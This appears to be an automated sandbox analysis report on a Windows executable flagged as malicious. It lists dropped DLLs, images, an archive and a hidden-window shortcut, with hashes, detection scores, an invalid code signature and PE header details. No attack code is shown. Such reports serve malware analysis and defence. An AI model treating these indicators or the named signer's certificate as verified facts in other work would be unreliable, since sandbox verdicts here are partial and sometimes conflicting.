                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):4.421240870835798
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsEtJg771I9s/WpW8VYjnYm8M4JB0KtFbqyq85zVKulXyfd:uIjfEHI7fu7Vw6J2yqQJVyfd
                                                                                              MD5:1EBC55DBD4AC08DC54E798794D41EA2D
                                                                                              SHA1:F71837E10D318E055C6DE8C1869309CB24FF199A
                                                                                              SHA-256:B2E7B975882FD053830C8BAF7870073081A236AA0074DDADE55EC1177E85F2A8
                                                                                              SHA-512:3BD86F2054BE7615A6655BF18C77C92291FDF7C991EF7644677225736B8A21E8E1515C7B55A3DD88D77F7FC373BABCFCCE580A0DC04DB2694C0F09B30A6B9664
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Dec 18 11:05:38 2024, mtime=Wed Dec 18 11:06:19 2024, atime=Wed Dec 18 11:05:46 2024, length=2659840, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):1072
                                                                                              Entropy (8bit):4.995563531030725
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:8mAbiGfxcYSegm2KwMSfSQZA7v4UVSU6FzbMUqygm:8m80e0MSfO1VSJlMdyg
                                                                                              MD5:30D2F001605639818A897A33962A4705
                                                                                              SHA1:2631DFCAF25836319BF006FA3A8CC91D8618BBE2
                                                                                              SHA-256:E4706B3F8B5654FF7077ECA7EF00EDFD1CCC05B1A49EEDA90BE72743033982AC
                                                                                              SHA-512:DAB695F522A86CBD81DBF2090D24879E6DE6C7495211881FA4D9BD50880725692F8D156299A791D61D84366FE297F44C8344A695B4AF6AE9BA11B7CD6D31AA6C
                                                                                              Malicious:false
                                                                                              Preview:L..................F.... ....3.'EQ..TOQ?EQ..g.+EQ....(.....................\.:..DG..Yr?.D..U..k0.&...&...... M......3.'EQ...o.AEQ......t...CFSF..1......Y.`..DOTA06~1....t.Y^...H.g.3..(.....gVA.G..k..........Y.`.Y.`..........................D.<.D.o.t.a.0.6.d.0.9.7.3.1.-.0.1.b.5.-.4.a.5.a.-.b.3.f.9.-.2.2.9.5.3.f.c.5.b.3.1.4...D.Z.2...(..Y.` .zfon.exe..B......Y.`.Y.`..........................._..z.f.o.n...e.x.e.......p...............-.......o...........:4a......C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe..D.....\.....\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.o.t.a.0.6.d.0.9.7.3.1.-.0.1.b.5.-.4.a.5.a.-.b.3.f.9.-.2.2.9.5.3.f.c.5.b.3.1.4.\.z.f.o.n...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.y.L.n.k.............:...........|....I.J.H..K..:...`.......X.......user-pc........hT..CrF.f4... ...~8....,...W..hT..CrF.f4... ...~8....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3..
                                                                                              Process:C:\Windows\hh.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):30
                                                                                              Entropy (8bit):2.6616157143988106
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:tblM6lEjln:tbhEZn
                                                                                              MD5:AE50B29A0B8DCC411F24F1863B0EAFDE
                                                                                              SHA1:D415A55627B1ADED8E4B2CBBA402F816B0461155
                                                                                              SHA-256:6B4BBBCE480FBC50D39A8EC4B72CDB7D781B151921E063DD899FD9B736ADCF68
                                                                                              SHA-512:D9A9BA42D99BE32D26667060BE1D523DCD20EAFA187A67F7919002CC6DA349FD058053C9C6F721D6FDB730EA02FBAA3013E51C0C653368BD6B3F57A4C0FCABA8
                                                                                              Malicious:true
                                                                                              Preview:C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.
                                                                                              Process:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):21
                                                                                              Entropy (8bit):3.368042422572716
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:hMCEpFQkv:hur9
                                                                                              MD5:2D282102FA671256327D4767EC23BC6B
                                                                                              SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                              SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                              SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                              Malicious:false
                                                                                              Preview:This is a test file..
                                                                                              Process:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):21
                                                                                              Entropy (8bit):3.368042422572716
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:hMCEpFQkv:hur9
                                                                                              MD5:2D282102FA671256327D4767EC23BC6B
                                                                                              SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                              SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                              SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                              Malicious:false
                                                                                              Preview:This is a test file..
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1119
                                                                                              Entropy (8bit):5.345080863654519
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                              MD5:88593431AEF401417595E7A00FE86E5F
                                                                                              SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                              SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                              SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                              Malicious:true
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):107416
                                                                                              Entropy (8bit):3.9981782829126855
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Plz6k8GYwXW3jk0QDRcE+zvNuLxKNCjBlzTPieb6PR1vP1QlJd5m5oypQqW3/g+L:EkiwhRcE+zk5eJ+hOihGxnlpEFOdKQI
                                                                                              MD5:32773B997C44077752C165C577D857A9
                                                                                              SHA1:E58922A6F7DD3F2A9F3C551597E7EBCBDAE0BD7F
                                                                                              SHA-256:0BD726D433201127942D7B1779D4345ABBEED7AE196E908CFA5FA27E876EFE05
                                                                                              SHA-512:8937643C5966FDF45555C1ACE664DE97F777FD2CC42ACA19A66E5A8B5B0020AF233A525DA2AA61B133EF580505A882DD5554312F0B2FECFD71C7838B4F7107C7
                                                                                              Malicious:false
                                                                                              Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):107416
                                                                                              Entropy (8bit):3.999081844772787
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:JlzckaGYwXW3jk0QDRcE+zvNuLxKNCjBlzTPieb6PR1vP1QlJd5m5oypQqW3/g+J:IkcwhRcE+zk5eJ+hOihGxnlpEFOdKQK
                                                                                              MD5:28763EA85BF6CE0DE5E358163A67053C
                                                                                              SHA1:3EA2C1B7F7FF27684428BF2C1E7B1DFD1907D049
                                                                                              SHA-256:DBC86AFEF8F743D4007A366558FC9DF1E1B277232E75369FA4FA861F84C80D29
                                                                                              SHA-512:CC9C9EF666DC7FD5446E355A0A9B21AC1541E45AA1239A176BDB71000118E1135F1A8821072159DF4A70BAB4C219631528BE385667C434D3A49C9B0340D03E36
                                                                                              Malicious:false
                                                                                              Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):891
                                                                                              Entropy (8bit):5.2071251641562215
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YWgc2CvLqZeH+avLqZ/uQBmwAkA53c27fyfH+2yrZMAdrKC8K/y8kEhq1HLxycXl:Yzc2CTDH9TCJAkC3c2IHt0drc6hE1opM
                                                                                              MD5:AC9F07C35AFD29813A45167DDD632507
                                                                                              SHA1:43D72AF268B5D47EBEE4AD5C6A755F0CB15F6A5B
                                                                                              SHA-256:0F612F484CCF090D4B8545A0F762BD201C05F4DA38B7940C7C85046FC8203137
                                                                                              SHA-512:C99AA7ED42FFC70DB771FC376389C34392D18C52B5458967B53476FFC63D4C3B0AAFF1652E84E6FCB8ECF5DA248D662EE1DC4C157496BA1BF76BD4A067E7DFC6
                                                                                              Malicious:false
                                                                                              Preview:{"serviceContext":{"serviceActivityId":"4cb3b434-acee-4f79-bce5-b76561184c32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"4cb3b434-acee-4f79-bce5-b76561184c32|2024-12-18T12:06:31.8595060Z|fabric_msn|EUS2-A|News_811","tier":"\u0000","clientActivityId":"A16F1333-918E-4891-9D0E-CB5A1C05777F"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):627992
                                                                                              Entropy (8bit):6.360523442335369
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
                                                                                              MD5:C1B066F9E3E2F3A6785161A8C7E0346A
                                                                                              SHA1:8B3B943E79C40BC81FDAC1E038A276D034BBE812
                                                                                              SHA-256:99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
                                                                                              SHA-512:36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: nrGkqbCyKP.exe, Detection: malicious, Browse
                                                                                              • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                              • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                              • Filename: drivers.exe, Detection: malicious, Browse
                                                                                              • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                              • Filename: drivers.exe, Detection: malicious, Browse
                                                                                              • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                              • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):119376
                                                                                              Entropy (8bit):6.605105564769165
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
                                                                                              MD5:E9B690FBE5C4B96871214379659DD928
                                                                                              SHA1:C199A4BEAC341ABC218257080B741ADA0FADECAF
                                                                                              SHA-256:A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
                                                                                              SHA-512:00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):660160
                                                                                              Entropy (8bit):7.996422927525233
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:tiTfEJiX3KaRppbIa6QJKuI+tdwh0b+ngpZfPd78cnFICTQLgMGatwJtiy9:WX3Ke5xI+ttqngpRD+CipGatwx
                                                                                              MD5:0CA6A22E9FEADB18C76712B5B0256B96
                                                                                              SHA1:46A678DCB5FC076816165DA255AB237D027975FB
                                                                                              SHA-256:8A8D9DD1DDDCA28A9063E828B1F8CE35D6DDC68692C988DA79BA957FDBC0035A
                                                                                              SHA-512:19B7754408DC79610B4447F6B7C55F9863378ECFD60A7496366DAA5CA4032DD0B2A0FD656D8112069D5385C45B57617C8B7B288BCDBCEB85BAB01FF44FB7D498
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 244397152
                                                                                              Category:dropped
                                                                                              Size (bytes):271126
                                                                                              Entropy (8bit):1.6290509027122977
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:62OeAYrjCbBn/J91NhFz6PWUaoolBso6lTqx2Y:6Dlp/T1NhJ6UB1fx2Y
                                                                                              MD5:D7B50924AB14320B946526EB3DB6A08F
                                                                                              SHA1:C114B1C3106C533E40470BE319094810670FE3BF
                                                                                              SHA-256:42719113D64459DBF01EADA16DE0723BD0EEF888E25A76C69306F122B2C66BE1
                                                                                              SHA-512:C39E877CE350977826793E6298FD93013846EE934CBCE639F16DCFBC91188AFF89C7F6C87C90A2A0B2A050627387C80C6354480F8E5655234EBBD7A8FD106449
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):244397152
                                                                                              Entropy (8bit):0.005451982949466598
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:8jPqt44MQyK3g/QsenSOOWdlzLfNVMaR7HxDGc9s7zUx:8jPk44M3K3gLKnLfNVMaRJGcu
                                                                                              MD5:EC97E838E8FDA95207C2E2D8BCCCA820
                                                                                              SHA1:B4510AA0F4A24125E2EC9C95FD3C144EFD10B8D0
                                                                                              SHA-256:0627D4A54BD14AEDA0C116723CAB0FBAB59A06096CB250EEA320EEC984A36592
                                                                                              SHA-512:0301EA4FAFB2060073C3008D25B682437FFF29250A46AA85687A580851787D5924AF824BF0A066E47B9F5370006EE63CAAB2D4F9CB68FAB7E11CC34EB28DFF57
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):49744
                                                                                              Entropy (8bit):6.675573056871668
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:EB49C1D33B41EB49DFED58AAFA9B9A8F
                                                                                              SHA1:61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
                                                                                              SHA-256:6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
                                                                                              SHA-512:D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):376421
                                                                                              Entropy (8bit):7.989777916441178
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:1E17E3F8B9917CE02CDB53F289DB96C9
                                                                                              SHA1:0B40A61EF4B5D1DBFD437896D1881A0EE5A457D9
                                                                                              SHA-256:D98A28F66F6B168164DB2C62AC1AD62F0316D52BBBEB7F8787300E429319E6B1
                                                                                              SHA-512:2DD8AC7914289056413927208B7451F5212DB598D8F6F91190CB7844BE1A937C239DAA9F8E9B91869D724527F20CAC04BD414AD28C0155F1B9D6200B91EDC881
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2659840
                                                                                              Entropy (8bit):6.694083259050332
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:44AD77338A945FE1451861B59267A68D
                                                                                              SHA1:F555C3A9AC9BBD5859D1958A844FCDD5E5106339
                                                                                              SHA-256:B0D418E149890608CF0BB3DCC7EA23F5AD645F5F598D62143FE3136692FA0962
                                                                                              SHA-512:CD02A0354E6B64BC21EC68DF966DA96B09BDC745A0F39B5CE7E3ED6051A2E909BD87E631830E8348F15539B4412A86AF12DAB928B0F19F2C44615E04344F9D77
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1835008
                                                                                              Entropy (8bit):4.42158171301493
                                                                                              Encrypted:false
                                                                                              SSDEEP:
                                                                                              MD5:56BEEB255FF732124CB1D77FF702E33F
                                                                                              SHA1:B693A55871358056EDBC1497F2D909046E5DEF14
                                                                                              SHA-256:7932E777419E4BACE30549B9EFCCCF3B715C7C2764908F6907F3B627B5DDD2A5
                                                                                              SHA-512:8471F731C7FAAC2CA1B1EC34935C1616DE79DFEAE1B8C95DF920C49C61CCA8CD01A3A2CF71BC8496AE4E34B432FCBD5D92B30B11C00D2F0137052077D4B39470
                                                                                              Malicious:false
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):6.1684566046977185
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:VJQyKuHEUe.exe
                                                                                              File size:185'744 bytes
                                                                                              MD5:703274fa7a3febb125ce7ea741a2d546
                                                                                              SHA1:557e4513056574074cb1a4070842561519136ec9
                                                                                              SHA256:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0
                                                                                              SHA512:bf983255c07b375545f5cbff83ebf6f44dd5a9fdcc45b31305fbdda4e2e5da10b207502122464eaeb5f0d0884cf5df36dcd548a169beedf2caa9a9d36cf752fe
                                                                                              SSDEEP:3072:+743otv7KWtY9eVd0YprmmojWDzGIVa8OSVsg5ujtp32y4mUq9tDdUW5:+E4B+WOU70YNvoiDKmsZtN2yJUwdUW5
                                                                                              TLSH:95047B27F2A44077E16A86359813CA254771BC1087609BEF13D8B61B9F337C16E39B7A
                                                                                              Icon Hash:2d2e3797b32b2b99
                                                                                              Entrypoint:0x42651e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0xD177A4E7 [Mon May 12 12:39:03 2081 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                              Error Number:-2146869232
                                                                                              Not Before, Not After
                                                                                              • 24/05/2021 20:00:00 28/05/2024 19:59:59
                                                                                              Subject Chain
                                                                                              • CN=Chengdu Qilu Technology Co. Ltd., O=Chengdu Qilu Technology Co. Ltd., L=\u6210\u90fd\u5e02, S=\u56db\u5ddd\u7701, C=CN
                                                                                              Version:3
                                                                                              Thumbprint MD5:187A069F86D379FE84D71BA37D3B2A30
                                                                                              Thumbprint SHA-1:4D7326B46527C9CBEEC83D4368EAF372300FFDCC
                                                                                              Thumbprint SHA-256:A2F571D518EAEF0A67CCC12AD3AAC3F240AA8B39A679E5A2F352700412306CAA
                                                                                              Serial:05DE6C1E6DCB34DF9869AEDC157F0725
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x264ca | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x6e99 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2ba00 | 0x1b90 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x30000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x26420 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x24524 | 0x24600 | c3782d8cf06bc31d8e9a1926fee3dbd0 | False | 0.5141215635738832 | data | 6.220523704368287 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x28000 | 0x6e99 | 0x7000 | 615dc3cc202532bceedd01393dff50ab | False | 0.177978515625 | data | 4.542306852421802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
